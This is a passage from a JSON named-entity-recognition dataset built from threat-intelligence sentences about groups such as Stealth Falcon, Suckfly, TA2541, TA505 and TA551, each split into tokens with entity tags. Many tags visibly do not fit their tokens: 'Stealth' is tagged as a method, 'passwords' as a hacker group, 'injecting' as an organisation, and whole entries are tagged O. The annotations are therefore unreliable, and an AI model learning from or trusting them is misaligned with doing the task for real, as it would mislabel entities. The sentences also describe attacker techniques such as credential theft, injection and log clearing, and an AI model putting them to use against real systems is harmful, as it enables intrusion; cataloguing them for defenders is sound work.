"serial", - "number,", - "version,", - "manufacturer,", - "model,", - "and", - "total", - "physical", - "memory." - ], - "ner_tags": [ - "B-SamFile", - "B-HackOrg", - "O", - "B-Features", - "I-Features", - "I-Features", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Stealth", - "Falcon", - "malware", - "gathers", - "the", - "Address", - "Resolution", - "Protocol", - "(ARP)", - "table", - "from", - "the", - "victim." - ], - "ner_tags": [ - "B-Way", - "I-Tool", - "I-Tool", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Stealth", - "Falcon", - "malware", - "gathers", - "the", - "registered", - "user", - "and", - "primary", - "owner", - "name", - "via", - "WMI." - ], - "ner_tags": [ - "B-Way", - "B-HackOrg", - "B-Tool", - "B-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Stealth", - "Falcon", - "malware", - "communicates", - "with", - "its", - "C2", - "server", - "via", - "HTTPS." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Stealth", - "Falcon", - "malware", - "gathers", - "passwords", - "from", - "the", - "Windows", - "Credential", - "Vault." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "B-Tool", - "B-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Stealth", - "Falcon", - "malware", - "gathers", - "system", - "information", - "via", - "Windows", - "Management", - "Instrumentation", - "(WMI)." - ], - "ner_tags": [ - "B-Way", - "I-Tool", - "I-Tool", - "B-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Strider", - "has", - "used", - "a", - "hidden", - "file", - "system", - "that", - "is", - "stored", - "as", - "a", - "file", - "on", - "disk." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Strider", - "has", - "used", - "local", - "servers", - "with", - "both", - "local", - "network", - "and", - "Internet", - "access", - "to", - "act", - "as", - "internal", - "proxy", - "nodes", - "to", - "exfiltrate", - "data", - "from", - "other", - "parts", - "of", - "the", - "network", - "without", - "direct", - "Internet", - "access." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Strider", - "has", - "registered", - "its", - "persistence", - "module", - "on", - "domain", - "controllers", - "as", - "a", - "Windows", - "LSA", - "(Local", - "System", - "Authority)", - "password", - "filter", - "to", - "acquire", - "credentials", - "any", - "time", - "a", - "domain,", - "local", - "user,", - "or", - "administrator", - "logs", - "in", - "or", - "changes", - "a", - "password." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Suckfly", - "has", - "used", - "stolen", - "certificates", - "to", - "sign", - "its", - "malware." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Suckfly", - "the", - "victim's", - "internal", - "network", - "for", - "hosts", - "with", - "ports", - "8080,", - "5900,", - "and", - "40", - "open." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Suckfly", - "used", - "a", - "signed", - "credential-dumping", - "tool", - "to", - "obtain", - "victim", - "account", - "credentials." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Suckfly", - "used", - "legitimate", - "account", - "credentials", - "that", - "they", - "dumped", - "to", - "navigate", - "the", - "internal", - "victim", - "network", - "as", - "though", - "they", - "were", - "the", - "legitimate", - "account", - "owner." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Several", - "tools", - "used", - "by", - "Suckfly", - "have", - "been", - "command-line", - "driven." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-OffAct", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TA2541", - "has", - "used", - "TLS", - "encrypted", - "C2", - "communications", - "including", - "for", - "campaigns", - "using", - "AsyncRAT." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "TA2541", - "has", - "attempted", - "to", - "disable", - "built-in", - "security", - "protections", - "such", - "as", - "Windows", - "AMSI." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TA2541", - "has", - "registered", - "domains", - "often", - "containing", - "the", - "keywords", - "“kimjoy,”", - "“h0pe,”", - "and", - "“grace,”", - "using", - "domain", - "registrars", - "including", - "Netdorm", - "and", - "No-IP", - "DDNS,", - "and", - "hosting", - "providers", - "including", - "xTom", - "GmbH", - "and", - "Danilenko,", - "Artyom." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-Idus", - "B-Org", - "O", - "B-Org", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TA2541", - "has", - "used", - "dynamic", - "DNS", - "services", - "for", - "C2", - "infrastructure." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TA2541", - "has", - "used", - "compressed", - "and", - "char-encoded", - "scripts", - "in", - "operations." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TA2541", - "has", - "used", - "malicious", - "scripts", - "and", - "macros", - "with", - "the", - "ability", - "to", - "download", - "additional", - "payloads." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Tool", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "TA2541", - "has", - "run", - "scripts", - "to", - "check", - "internet", - "connectivity", - "from", - "compromised", - "hosts." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TA2541", - "has", - "used", - "macro-enabled", - "MS", - "Word", - "documents", - "to", - "lure", - "victims", - "into", - "executing", - "malicious", - "payloads." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "I-SamFile", - "I-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TA2541", - "has", - "used", - "malicious", - "links", - "to", - "cloud", - "and", - "web", - "services", - "to", - "gain", - "execution", - "on", - "victim", - "machines." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TA2541", - "has", - "used", - "multiple", - "strains", - "of", - "malware", - "available", - "for", - "purchase", - "on", - "criminal", - "forums", - "or", - "in", - "open-source", - "repositories." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TA2541", - "has", - "used", - "file", - "names", - "to", - "mimic", - "legitimate", - "Windows", - "files", - "or", - "system", - "functionality." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TA2541", - "has", - "used", - "`mshta`", - "to", - "execute", - "scripts", - "including", - "VBS." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TA2541", - "has", - "used", - "PowerShell", - "to", - "download", - "files", - "and", - "to", - "inject", - "into", - "various", - "Windows", - "processes." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TA2541", - "has", - "used", - "process", - "hollowing", - "to", - "execute", - "CyberGate", - "malware." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "TA2541", - "has", - "injected", - "malicious", - "code", - "into", - "legitimate", - ".NET", - "related", - "processes", - "including", - "regsvcs.exe,", - "msbuild.exe,", - "and", - "installutil.exe." - ], - "ner_tags": [ - "B-Idus", - "O", - "I-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "TA2541", - "has", - "placed", - "VBS", - "files", - "in", - "the", - "Startup", - "folder", - "and", - "used", - "Registry", - "run", - "keys", - "to", - "establish", - "persistence", - "for", - "malicious", - "payloads." - ], - "ner_tags": [ - "B-Idus", - "O", - "I-Way", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TA2541", - "has", - "used", - "scheduled", - "tasks", - "to", - "establish", - "persistence", - "for", - "installed", - "tools." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TA2541", - "has", - "used", - "tools", - "to", - "search", - "victim", - "systems", - "for", - "security", - "products", - "such", - "as", - "antivirus", - "and", - "firewall", - "software." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "TA2541", - "has", - "used", - "a", - ".NET", - "packer", - "to", - "obfuscate", - "malicious", - "files." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TA2541", - "has", - "sent", - "phishing", - "emails", - "with", - "malicious", - "attachments", - "for", - "initial", - "access", - "including", - "MS", - "Word", - "documents." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "TA2541", - "has", - "used", - "spearphishing", - "e-mails", - "with", - "malicious", - "links", - "to", - "deliver", - "malware." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TA2541", - "has", - "collected", - "system", - "information", - "prior", - "to", - "downloading", - "malware", - "on", - "the", - "targeted", - "host." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TA2541", - "has", - "used", - "commodity", - "remote", - "access", - "tools." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "TA2541", - "has", - "uploaded", - "malware", - "to", - "various", - "platforms", - "including", - "Google", - "Drive,", - "Pastetext,", - "Sharetext,", - "and", - "GitHub." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TA2541", - "has", - "used", - "VBS", - "files", - "to", - "execute", - "or", - "establish", - "persistence", - "for", - "additional", - "payloads,", - "often", - "using", - "file", - "names", - "consistent", - "with", - "email", - "themes", - "or", - "mimicking", - "system", - "functionality." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TA2541", - "has", - "hosted", - "malicious", - "files", - "on", - "various", - "platforms", - "including", - "Google", - "Drive,", - "OneDrive,", - "Discord,", - "PasteText,", - "ShareText,", - "and", - "GitHub." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "B-Way", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "TA2541", - "has", - "used", - "WMI", - "to", - "query", - "targeted", - "systems", - "for", - "security", - "products." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TA459", - "has", - "exploited", - "Microsoft", - "Word", - "vulnerability", - "CVE-2017-0199", - "for", - "execution." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Exp", - "I-Exp", - "I-Exp", - "B-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "TA459", - "has", - "attempted", - "to", - "get", - "victims", - "to", - "open", - "malicious", - "Microsoft", - "Word", - "attachment", - "sent", - "via", - "spearphishing." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-SamFile", - "I-SamFile", - "I-SamFile", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "TA459", - "has", - "used", - "PowerShell", - "for", - "execution", - "of", - "a", - "payload." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TA459", - "has", - "targeted", - "victims", - "using", - "spearphishing", - "emails", - "with", - "malicious", - "Microsoft", - "Word", - "attachments." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "I-SamFile", - "I-SamFile", - "B-SecTeam" - ] - }, - { - "tokens": [ - "TA459", - "has", - "a", - "VBScript", - "for", - "execution." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TA505", - "has", - "signed", - "payloads", - "with", - "code", - "signing", - "certificates", - "from", - "Thawte", - "and", - "Sectigo." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TA505", - "has", - "used", - "base64", - "encoded", - "PowerShell", - "commands." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "TA505", - "has", - "used", - "malware", - "to", - "gather", - "credentials", - "from", - "FTP", - "clients", - "and", - "Outlook." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TA505", - "has", - "used", - "malware", - "to", - "gather", - "credentials", - "from", - "Internet", - "Explorer." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TA505", - "has", - "used", - "a", - "wide", - "variety", - "of", - "ransomware,", - "such", - "as", - "Clop,", - "Locky,", - "Jaff,", - "Bart,", - "Philadelphia,", - "and", - "GlobeImposter,", - "to", - "encrypt", - "victim", - "files", - "and", - "demand", - "a", - "ransom", - "payment." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "B-Way", - "B-Tool", - "B-Tool", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TA505", - "has", - "decrypted", - "packed", - "DLLs", - "with", - "an", - "XOR", - "key." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TA505", - "has", - "used", - "malware", - "to", - "disable", - "Windows", - "Defender." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TA505", - "has", - "used", - "stolen", - "domain", - "admin", - "accounts", - "to", - "compromise", - "additional", - "hosts." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TA505", - "has", - "registered", - "domains", - "to", - "impersonate", - "services", - "such", - "as", - "Dropbox", - "to", - "distribute", - "malware." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TA505", - "has", - "leveraged", - "malicious", - "Word", - "documents", - "that", - "abused", - "DDE." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-SamFile", - "I-SamFile", - "I-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TA505", - "has", - "been", - "seen", - "injecting", - "a", - "DLL", - "into", - "winword.exe." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Org", - "B-OffAct", - "B-Way", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "TA505", - "has", - "used", - "the", - "tool", - "EmailStealer", - "to", - "steal", - "and", - "send", - "lists", - "of", - "e-mail", - "addresses", - "to", - "a", - "remote", - "server." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TA505", - "has", - "password-protected", - "malicious", - "Word", - "documents." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "I-Way", - "O" - ] - }, - { - "tokens": [ - "TA505", - "has", - "used", - "fast", - "flux", - "to", - "mask", - "botnets", - "by", - "distributing", - "payloads", - "across", - "multiple", - "IPs." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TA505", - "has", - "downloaded", - "additional", - "malware", - "to", - "execute", - "on", - "victim", - "systems." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TA505", - "has", - "used", - "JavaScript", - "for", - "code", - "execution." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TA505", - "has", - "used", - "lures", - "to", - "get", - "users", - "to", - "enable", - "content", - "in", - "malicious", - "attachments", - "and", - "execute", - "malicious", - "files", - "contained", - "in", - "archives.", - "For", - "example,", - "TA505", - "makes", - "their", - "malware", - "look", - "like", - "legitimate", - "Microsoft", - "Word", - "documents,", - ".pdf", - "and/or", - ".lnk", - "files." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "I-SamFile", - "I-SamFile", - "O", - "B-SamFile", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "TA505", - "has", - "used", - "lures", - "to", - "get", - "users", - "to", - "click", - "links", - "in", - "emails", - "and", - "attachments.", - "For", - "example,", - "TA505", - "makes", - "their", - "malware", - "look", - "like", - "legitimate", - "Microsoft", - "Word", - "documents,", - ".pdf", - "and/or", - ".lnk", - "files." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "I-SamFile", - "I-SamFile", - "O", - "B-SamFile", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "TA505", - "has", - "used", - "malware", - "such", - "as", - "Azorult", - "and", - "Cobalt", - "Strike", - "in", - "their", - "operations." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TA505", - "has", - "used", - ".iso", - "files", - "to", - "deploy", - "malicious", - ".lnk", - "files." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "TA505", - "has", - "used", - "malware", - "to", - "disable", - "Windows", - "Defender", - "through", - "modification", - "of", - "the", - "Registry." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TA505", - "has", - "used", - "<code>msiexec</code>", - "to", - "download", - "and", - "execute", - "malicious", - "Windows", - "Installer", - "files." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TA505", - "has", - "deployed", - "payloads", - "that", - "use", - "Windows", - "API", - "calls", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TA505", - "has", - "used", - "TinyMet", - "to", - "enumerate", - "members", - "of", - "privileged", - "groups.", - "TA505", - "has", - "also", - "run", - "<code>net", - "group", - "/domain</code>." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TA505", - "has", - "used", - "PowerShell", - "to", - "download", - "and", - "execute", - "malware", - "and", - "reconnaissance", - "scripts." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TA505", - "has", - "leveraged", - "<code>rundll32.exe</code>", - "to", - "execute", - "malicious", - "DLLs." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TA505", - "has", - "used", - "UPX", - "to", - "obscure", - "malicious", - "code." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TA505", - "has", - "used", - "spearphishing", - "emails", - "with", - "malicious", - "attachments", - "to", - "initially", - "compromise", - "victims." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TA505", - "has", - "sent", - "spearphishing", - "emails", - "containing", - "malicious", - "links." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TA505", - "has", - "used", - "a", - "variety", - "of", - "tools", - "in", - "their", - "operations,", - "including", - "AdFind,", - "BloodHound,", - "Mimikatz,", - "and", - "PowerSploit." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "TA505", - "has", - "staged", - "malware", - "on", - "actor-controlled", - "domains." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TA505", - "has", - "used", - "VBS", - "for", - "code", - "execution." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TA505", - "has", - "used", - "HTTP", - "to", - "communicate", - "with", - "C2", - "nodes." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TA505", - "has", - "executed", - "commands", - "using", - "<code>cmd.exe</code>." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TA551", - "has", - "used", - "obfuscated", - "variable", - "names", - "in", - "a", - "JavaScript", - "configuration", - "file." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TA551", - "has", - "used", - "a", - "DGA", - "to", - "generate", - "URLs", - "from", - "executed", - "macros." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TA551", - "has", - "used", - "spoofed", - "company", - "emails", - "that", - "were", - "acquired", - "from", - "email", - "clients", - "on", - "previously", - "infected", - "hosts", - "to", - "target", - "other", - "individuals." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TA551", - "has", - "retrieved", - "DLLs", - "and", - "installer", - "binaries", - "for", - "malware", - "execution", - "from", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TA551", - "has", - "prompted", - "users", - "to", - "enable", - "macros", - "within", - "spearphishing", - "attachments", - "to", - "install", - "malware." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TA551", - "has", - "masked", - "malware", - "DLLs", - "as", - "dat", - "and", - "jpg", - "files." - ], - "ner_tags": [ - "B-Idus", - "O", - "I-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TA551", - "has", - "used", - "mshta.exe", - "to", - "execute", - "malicious", - "payloads." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TA551", - "has", - "used", - "regsvr32.exe", - "to", - "load", - "malicious", - "DLLs." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TA551", - "has", - "used", - "rundll32.exe", - "to", - "load", - "malicious", - "DLLs." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TA551", - "has", - "sent", - "spearphishing", - "attachments", - "with", - "password", - "protected", - "ZIP", - "files." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TA551", - "has", - "used", - "encoded", - "ASCII", - "text", - "for", - "initial", - "C2", - "communications." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TA551", - "has", - "hidden", - "encoded", - "data", - "for", - "malware", - "DLLs", - "in", - "a", - "PNG." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TA551", - "has", - "used", - "HTTP", - "for", - "C2", - "communications." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TA551", - "has", - "used", - "<code>cmd.exe</code>", - "to", - "execute", - "commands." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TeamTNT", - "has", - "used", - "an", - "IRC", - "bot", - "for", - "C2", - "communications." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "B-Org", - "O" - ] - }, - { - "tokens": [ - "TeamTNT", - "has", - "cleared", - "command", - "history", - "with", - "<code>history", - "-c</code>." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - 